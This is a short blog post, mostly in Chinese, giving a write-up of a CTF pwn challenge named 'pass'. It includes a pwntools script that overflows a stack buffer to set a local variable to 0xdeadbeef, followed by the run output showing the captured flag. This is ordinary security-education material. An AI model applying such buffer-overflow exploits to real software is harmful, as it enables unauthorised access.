Pwnctf pass Writeup

kazma 成大資安社 創辦人/社長
  2023-12-20 21:35:27 2023-12-20 21:35:27 Created   2023-12-20 22:01:14 2023-12-20 22:01:14 Updated    

pass

這題直接 r2 看一下 main 的這兩個地方:

r2

r22

控好 var_4h 就結束了,exploit.py:

1
2
3
4
5
6
7
8
from pwn import *

r = process('./pass')

p = b'a'*0x1c + p32(0xdeadbeef)

r.sendlineafter(b'?', p)
r.interactive()

result:

1
2
3
4
5
6
7
8
└─$ python exploit.py
[+] Starting local process './pass': pid 301129
[*] Switching to interactive mode
Door open. OwO
FLAG{xtnntfhzflpttvxvzzbfjfnxbjvrzxdfvzlvhpt}
cat: /home/ctf/flag: No such file or directory
[*] Process './pass' stopped with exit code 0 (pid 301129)
[*] Got EOF while reading in interactive

Pwned !!!

  • Title: Pwnctf pass Writeup
  • Author: kazma
  • Created at : 2023-12-20 21:35:27
  • Updated at : 2023-12-20 22:01:14
  • Link: https://kazma.tw/2023/12/20/Pwnctf-pass-Writeup/
  • License: This work is licensed under CC BY-NC-SA 4.0.
Comments
On this page
Pwnctf pass Writeup
  1. pass